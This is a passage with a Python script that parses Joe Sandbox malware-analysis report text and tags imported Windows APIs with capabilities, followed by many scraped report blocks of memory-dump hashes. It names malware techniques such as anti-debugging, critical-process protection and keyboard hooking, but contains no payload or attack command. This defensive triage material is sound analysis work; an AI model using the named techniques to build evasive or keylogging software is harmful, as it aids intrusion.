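HEX_RANGE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")
HEX_ONLY = re.compile(r"^[0-9a-f]+$")
SNAPSHOT = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd")


@dataclass
class FunctionRecord:
    process: str = ""      # process name, taken from the snapshot file name
    dump_base: str = ""    # base address of the memory dump the code came from
    entry: str = ""        # start address of the first CFG node
    apis: list[str] = field(default_factory=list)  # literal import names in the CFG
    api_id: str = ""       # Joe Sandbox's normalized API token (e.g. "HookWindows")
    string_id: str = ""
    instruction_fuzzy_hash: str = ""
    uniqueness: str = ""


def _parse_cfg(line: str, rec: FunctionRecord) -> None:
    """Pull the entry address and import names out of a control_flow_graph line."""
    for tok in line.split()[1:]:  # drop the leading "control_flow_graph"
        if not rec.entry and HEX_RANGE.match(tok):
            rec.entry = tok.split("-")[0]
        # Node ids, edges and address ranges start with a digit; "call" is graph
        # syntax; anything else alphabetic and non-hex is an imported API name.
        if tok[0].isalpha() and tok != "call" and not HEX_ONLY.match(tok):
            rec.apis.append(tok)


def parse_report(text: str) -> list[FunctionRecord]:
    """Split flattened report text into one FunctionRecord per function block."""
    records: list[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()  # bullets are page rendering only
        if not line:
            continue
        if line.startswith("control_flow_graph"):
            _parse_cfg(line, cur)
        elif line.startswith("Source File:"):
            m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", line)
            cur.dump_base = m.group(1).lower() if m else ""
        elif line.startswith("Snapshot File:"):
            m = SNAPSHOT.search(line)
            cur.process = m.group(4) if m else ""
        elif line.startswith("API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy_hash = line.split(":", 1)[1].strip()
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness = line.split(":", 1)[1].strip()
            records.append(cur)  # this line closes a block
            cur = FunctionRecord()
    return records


def triage(records: list[FunctionRecord]) -> list[dict[str, str]]:
    """One hit per (function, import) pair, tagged with the mapped capability."""
    return [
        {"process": r.process, "entry": r.entry, "api": api,
         "capability": CAPABILITY.get(api, "unclassified: review manually")}
        for r in records for api in r.apis
    ]


# Constructed excerpt mirroring the blocks on this page (abbreviated, not the full report).
SAMPLE_REPORT = """
control_flow_graph 1056 7ff848f178c1-7ff848f1797d CheckRemoteDebuggerPresent 1060 7ff848f1797f 1056->1060 1061 7ff848f17985-7ff848f179c8 1056->1061 1060->1061
APIs
Memory Dump Source
• Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
• Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Instruction Fuzzy Hash: 5631DF31908B5C8FCB58DF58C88A7EA7BF0EF65321F05426AD489D7292DB34A845CB91
Uniqueness Score: -1.00%
control_flow_graph 1035 7ff848f1ad4d-7ff848f1ae30 RtlSetProcessIsCritical 1039 7ff848f1ae38-7ff848f1ae6d 1035->1039 1040 7ff848f1ae32 1035->1040 1040->1039
• Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
• API ID: CriticalProcess
Uniqueness Score: -1.00%
control_flow_graph 1042 7ff848f1b3c8-7ff848f1b3cf 1043 7ff848f1b3da-7ff848f1b44d 1042->1043 1050 7ff848f1b462-7ff848f1b49f SetWindowsHookExW 1048->1050
• Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
• API ID: HookWindows
Uniqueness Score: -1.00%
Strings
• Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
• Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
• API ID:
• String ID: 8>$I
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for hit in triage(parse_report(SAMPLE_REPORT)):
        print(f"{hit['process']}!{hit['entry']}  {hit['api']}: {hit['capability']}")
```

Two caveats for anyone using this on the page above. SetWindowsHookExW only implies keylogging when the hook id is WH_KEYBOARD_LL or WH_KEYBOARD, and the graph does not show that argument; the "log keystrokes" signature in the header rests on the .NET source, not on this call alone. RtlSetProcessIsCritical is what the "Protects its processes via BreakOnTermination flag" signature refers to: terminating a critical process produces a CRITICAL_PROCESS_DIED bugcheck, so during response suspend the process or clear the flag instead of killing it.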
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8
                                                                                • API String ID: 0-4194326291
                                                                                • Opcode ID: e9aed3f27721f9065997de0e06c531533b4a8e6bbaecdad94479726ffdb46359
                                                                                • Instruction ID: a30e19d3830d0569b750d083d98c074331b0226c9b1c671d3da007ebaf1e1082
                                                                                • Opcode Fuzzy Hash: e9aed3f27721f9065997de0e06c531533b4a8e6bbaecdad94479726ffdb46359
                                                                                • Instruction Fuzzy Hash: 30727170B29A099FE748EB288899779B7E2FF98744F544579D00DD32D2DF38A8818B41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3327193206.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_X1.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: daa8525b7fc013005b9dac82685a31b9f8d2700faadf8c87d36ec292a2455c1f
                                                                                • Instruction ID: bbde69301097a377f0d45fe586abe4b62fe02fb2653fa85ceaaa92c859decef4
                                                                                • Opcode Fuzzy Hash: daa8525b7fc013005b9dac82685a31b9f8d2700faadf8c87d36ec292a2455c1f
                                                                                • Instruction Fuzzy Hash: 2AD1A63091CA8D4FEBA8EF28C8557E977E1FF59350F04426EE84DC7291CB74A9458B82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-3685135179
                                                                                • Opcode ID: 48abb28cd118ad687f7c9b2c527083c417fa6c5659fb4f612cb3f02abd693190
                                                                                • Instruction ID: 5ccf2fb0a7665017336051caab8e05a208286471d580d162b990a8db7c654fdd
                                                                                • Opcode Fuzzy Hash: 48abb28cd118ad687f7c9b2c527083c417fa6c5659fb4f612cb3f02abd693190
                                                                                • Instruction Fuzzy Hash: C0D10E31D0EA8A5FE799AB2858155B5BBE0EF1A2A4F1801FFD50DCB0D3EE1C9805C356
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: 8edd4b66b31221791d2e333fc325485bb3ac7a759b460cca757efa34812b36d9
                                                                                • Instruction ID: 2093772ac164ea2546decbab895eab3df4e0a12c2a3d5beb5f3f9428e0c38df4
                                                                                • Opcode Fuzzy Hash: 8edd4b66b31221791d2e333fc325485bb3ac7a759b460cca757efa34812b36d9
                                                                                • Instruction Fuzzy Hash: 7451F732A0DA4A4FE79AEB2C541167577D2FF65260F5801BBD20EC72D3DF18E8058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: ee9febd8337120a780f2599fe50170968fa5505f9b54edacea3b580e63b9bf2a
                                                                                • Instruction ID: c66d5833b496f83386744ad542fa19d6ddee696ef37015518a87c6327ae46bd7
                                                                                • Opcode Fuzzy Hash: ee9febd8337120a780f2599fe50170968fa5505f9b54edacea3b580e63b9bf2a
                                                                                • Instruction Fuzzy Hash: 95412832E0DA894FE7A9EB2C64106B877E1EF55760F4801BBC65DC71C3EB18AC158395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: a9bf6436f98a462412b2c5a465fb538b075d4a9a62e273b9427d282f2bf9c39f
                                                                                • Instruction ID: f60270cf8c31db9bd8dfa357f0bab316248a1efbdff6518c06e9f17f0f7be4db
                                                                                • Opcode Fuzzy Hash: a9bf6436f98a462412b2c5a465fb538b075d4a9a62e273b9427d282f2bf9c39f
                                                                                • Instruction Fuzzy Hash: DD21D032E0EA874FE7AAEB18545113466D2FF602A4F5801BAD20EC72D3DF18DC058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2141145267.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: 7ceaab993b5b026b3ac8d0bf2c6eb90d9c4d965a6a3617d49b70aa4425dbc2dd
                                                                                • Instruction ID: 3d85ef9544d8e18af1df074afb0ae3594b0a3ace855b1cdecafe131dfb0646f5
                                                                                • Opcode Fuzzy Hash: 7ceaab993b5b026b3ac8d0bf2c6eb90d9c4d965a6a3617d49b70aa4425dbc2dd
                                                                                • Instruction Fuzzy Hash: 4211C232D0E58A4FE7A9EB2894545B87BE1FF20660F5800FBC61DDB1D3DB19AC149385
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 46b502c7750fc2643517fbe5d65149f280e61dc346a1dde43aaf1357b5671cc2
                                                                                • Instruction ID: 2228dfc0e92ff07b8405e9b1cb33d395a8e1312c12dcd8a608b716f50f3f9447
                                                                                • Opcode Fuzzy Hash: 46b502c7750fc2643517fbe5d65149f280e61dc346a1dde43aaf1357b5671cc2
                                                                                • Instruction Fuzzy Hash: 80412831D1CA888FDB18DF1CB8066F97BE1FB64711F00416FE04883292DB35A8568BC6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: af35d9ac88247dbc6a766b12beb0b9d97f19e164793b26f38da75a739eb4f33d
                                                                                • Instruction ID: 7cfb129b3aba94f5431b8a2b6274a1e773b6cd2cab4e31dd9f47a80d372bb1d2
                                                                                • Opcode Fuzzy Hash: af35d9ac88247dbc6a766b12beb0b9d97f19e164793b26f38da75a739eb4f33d
                                                                                • Instruction Fuzzy Hash: 32410F77C0E9958FE755EB6CB8520E53BA0EF11BB6F0802B7D04C4E0D3EE1D68858655
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2139935423.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848e0d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1da8f4dca79838dae44011df64a98b2bb91e0e77ef0bca8469bdeb21a51ebe8a
                                                                                • Instruction ID: f54501312ff187400ef84dc97cdf68d4b8c37f4599fc105fbfadb0a4b0d07d8b
                                                                                • Opcode Fuzzy Hash: 1da8f4dca79838dae44011df64a98b2bb91e0e77ef0bca8469bdeb21a51ebe8a
                                                                                • Instruction Fuzzy Hash: E641E17180DBC54FE7569B2898459623FB0EF53360F1505FFD088CB1A3E629A846C792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 920c9e4e2106d3b4fc30c238ce53e85dbc87a94bfd48fac1275c69eccd5ba711
                                                                                • Instruction ID: b6d2006c822e7ad368ae6b0b10f33bbf853a8f99958814421123454a584c8a1a
                                                                                • Opcode Fuzzy Hash: 920c9e4e2106d3b4fc30c238ce53e85dbc87a94bfd48fac1275c69eccd5ba711
                                                                                • Instruction Fuzzy Hash: D821297080C7888FE709DB689C4A6F97FA4EB53321F08415ED445D71A3DA795846CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                                • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                                • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                • API String ID: 0-1500707516
                                                                                • Opcode ID: 08bb90f686276d95e832c48d7e551bf12ce9c831127d6a1bb33194d488d218d5
                                                                                • Instruction ID: 222d844bbf94215a77f2e18ad69bec1db98ceac06232a07d42ecf6d4690642d1
                                                                                • Opcode Fuzzy Hash: 08bb90f686276d95e832c48d7e551bf12ce9c831127d6a1bb33194d488d218d5
                                                                                • Instruction Fuzzy Hash: 94215777319455EED20137ADB8005DD7390DB902BA78803B3E158CF043EE1CA08746D4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2140616546.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: M_^$M_^$M_^$M_^
                                                                                • API String ID: 0-1397233021
                                                                                • Opcode ID: 4a76f62f8b7df324cd436c9a77b84c3755a5f8ec441fdcb76ebd144e4febee8d
                                                                                • Instruction ID: 64c2ce831230e0f93b401b5ad18bf1cea321504c76c4cc8d36768459cfc15fe1
                                                                                • Opcode Fuzzy Hash: 4a76f62f8b7df324cd436c9a77b84c3755a5f8ec441fdcb76ebd144e4febee8d
                                                                                • Instruction Fuzzy Hash: C7419377A0DAC25FF35B973868690957F90FF52B95B8902F6C0888B0D3FE1A5C078615
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-3685135179
                                                                                • Opcode ID: 6545781285dd84acabe0c7138034109019dc86ed610c329fd95f34f15b9ead37
                                                                                • Instruction ID: c27aa0d81e50c4e65b5e21c080704ad35cf05a4fb8ab2ef745183bdf847055ad
                                                                                • Opcode Fuzzy Hash: 6545781285dd84acabe0c7138034109019dc86ed610c329fd95f34f15b9ead37
                                                                                • Instruction Fuzzy Hash: 1CE12331E0EA8A5FE799AB2858545B5BBE0EF1A290F1801FFD14DC71D3EE1C9805C366
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-3685135179
                                                                                • Opcode ID: 5f8837c772919254fdc7fa153ef601faebe1b6907e6b5865a9208d6ea5be18f9
                                                                                • Instruction ID: 276951a7c248bdfac023302b4d04021c975eaacbcda6fe2681af221a827a050b
                                                                                • Opcode Fuzzy Hash: 5f8837c772919254fdc7fa153ef601faebe1b6907e6b5865a9208d6ea5be18f9
                                                                                • Instruction Fuzzy Hash: C6B1FE31D1EA8A5FE799AB2858145B5BBE0EF19394F1802BFD50DCB0D3EE1CA804C359
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: (B$I$(B$I$(B$I$(B$I
                                                                                • API String ID: 0-2819540369
                                                                                • Opcode ID: 6c75501edc71991407d185bb6e51900d101dd5d4f9ba9f9ecddef2166284396f
                                                                                • Instruction ID: a4354923a2d16666303f8734dc5fe53b9ba4074d5a43f84f3cee0ccaeb0626b4
                                                                                • Opcode Fuzzy Hash: 6c75501edc71991407d185bb6e51900d101dd5d4f9ba9f9ecddef2166284396f
                                                                                • Instruction Fuzzy Hash: 3351EF31E0EAC65FE799AB281450578AAE0EF1A694F1800FFC24DDB0D7EE0C9804C359
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: a90f06f751f71d05f862af307a9a3074becd3750b2d0b5934708246748cd4f2f
                                                                                • Instruction ID: 2093772ac164ea2546decbab895eab3df4e0a12c2a3d5beb5f3f9428e0c38df4
                                                                                • Opcode Fuzzy Hash: a90f06f751f71d05f862af307a9a3074becd3750b2d0b5934708246748cd4f2f
                                                                                • Instruction Fuzzy Hash: 7451F732A0DA4A4FE79AEB2C541167577D2FF65260F5801BBD20EC72D3DF18E8058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: jR_L
                                                                                • API String ID: 0-1487830661
                                                                                • Opcode ID: 373195ffc0551dfc2e9c82dad34bef7c0e0c399d41eaa67ee5baecd1f4078597
                                                                                • Instruction ID: 1c98969452982c378c27865ec156456ef461f6d90ba549aac6b57aea6859de59
                                                                                • Opcode Fuzzy Hash: 373195ffc0551dfc2e9c82dad34bef7c0e0c399d41eaa67ee5baecd1f4078597
                                                                                • Instruction Fuzzy Hash: 7951453051EBC54FE30AEB289855960BBE0EF56354B1804FED08AC71A3EA1AAC47C756
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: bd3134708b9508d88cde56437e5832b098b9f7f4f47ad54bf6de262e68df5a78
                                                                                • Instruction ID: c66d5833b496f83386744ad542fa19d6ddee696ef37015518a87c6327ae46bd7
                                                                                • Opcode Fuzzy Hash: bd3134708b9508d88cde56437e5832b098b9f7f4f47ad54bf6de262e68df5a78
                                                                                • Instruction Fuzzy Hash: 95412832E0DA894FE7A9EB2C64106B877E1EF55760F4801BBC65DC71C3EB18AC158395
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 8>$I
                                                                                • API String ID: 0-3301367642
                                                                                • Opcode ID: be43e86c6a6e8ad6ccbc3c54d5a60de4a88491d1830a0c691e4e6a888809aef0
                                                                                • Instruction ID: f60270cf8c31db9bd8dfa357f0bab316248a1efbdff6518c06e9f17f0f7be4db
                                                                                • Opcode Fuzzy Hash: be43e86c6a6e8ad6ccbc3c54d5a60de4a88491d1830a0c691e4e6a888809aef0
                                                                                • Instruction Fuzzy Hash: DD21D032E0EA874FE7AAEB18545113466D2FF602A4F5801BAD20EC72D3DF18DC058349
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p>$I
                                                                                • API String ID: 0-2590420872
                                                                                • Opcode ID: f76b8cfabe6f399c3b77b22677ecca973f7800efbf2d5ee610a8a4f5f721b868
                                                                                • Instruction ID: 3d85ef9544d8e18af1df074afb0ae3594b0a3ace855b1cdecafe131dfb0646f5
                                                                                • Opcode Fuzzy Hash: f76b8cfabe6f399c3b77b22677ecca973f7800efbf2d5ee610a8a4f5f721b868
                                                                                • Instruction Fuzzy Hash: 4211C232D0E58A4FE7A9EB2894545B87BE1FF20660F5800FBC61DDB1D3DB19AC149385
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 63b6e842f5373dda590ecefc571f46dc994ef97651b18fc8f52aed49b3d89bba
                                                                                • Instruction ID: e2776746ee58272f7644c4a673d98923fd2e53042e93d135c94e8b9ed0745c97
                                                                                • Opcode Fuzzy Hash: 63b6e842f5373dda590ecefc571f46dc994ef97651b18fc8f52aed49b3d89bba
                                                                                • Instruction Fuzzy Hash: 5231FA3191CB484FDB1C9F1CAC066A97BE0FB55711F00416FE449C3692CB75A855CBC6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263237028.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848e0d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d3783ea8a554ba1ed41b8ca36e3d5bf6b7162532e2118b4e06cd1ef100776b04
                                                                                • Instruction ID: 3927d3f116c9cc0d3d0b847fcabe86fbef0f9d4373b1f74c1ea95ce3dd5e058e
                                                                                • Opcode Fuzzy Hash: d3783ea8a554ba1ed41b8ca36e3d5bf6b7162532e2118b4e06cd1ef100776b04
                                                                                • Instruction Fuzzy Hash: E441183180DBC55FE7669B2898459623FF0FF53264F1509EFD089CB1A3E625A806CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2263947636.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848f20000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 348c0f31d01885bb5a2f596bfcd3b72e029bff2cda4d685b0296f6a47ed6c28b
                                                                                • Instruction ID: 392b5d687373e4f5744aa8e50ff19a75fe3d884171f2e48a0e25c8895d5f4d81
                                                                                • Opcode Fuzzy Hash: 348c0f31d01885bb5a2f596bfcd3b72e029bff2cda4d685b0296f6a47ed6c28b
                                                                                • Instruction Fuzzy Hash: 0631297180D7C88FD70A8B689C995B97FB4EF53210F0841DFD084CB1A3DA295846CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2264657912.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_7ff848ff0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 027b9267abf56e8bf246d2554664bda3d71cbaf52fa60a4f2f289a5029d4bd22
                                                                                • Instruction ID: df69598eadf38e7b51ad4fc2cbbf7e135e500176847a85d6aa0aea64f4107003
                                                                                • Opcode Fuzzy Hash: 027b9267abf56e8bf246d2554664bda3d71cbaf52fa60a4f2f289a5029d4bd22
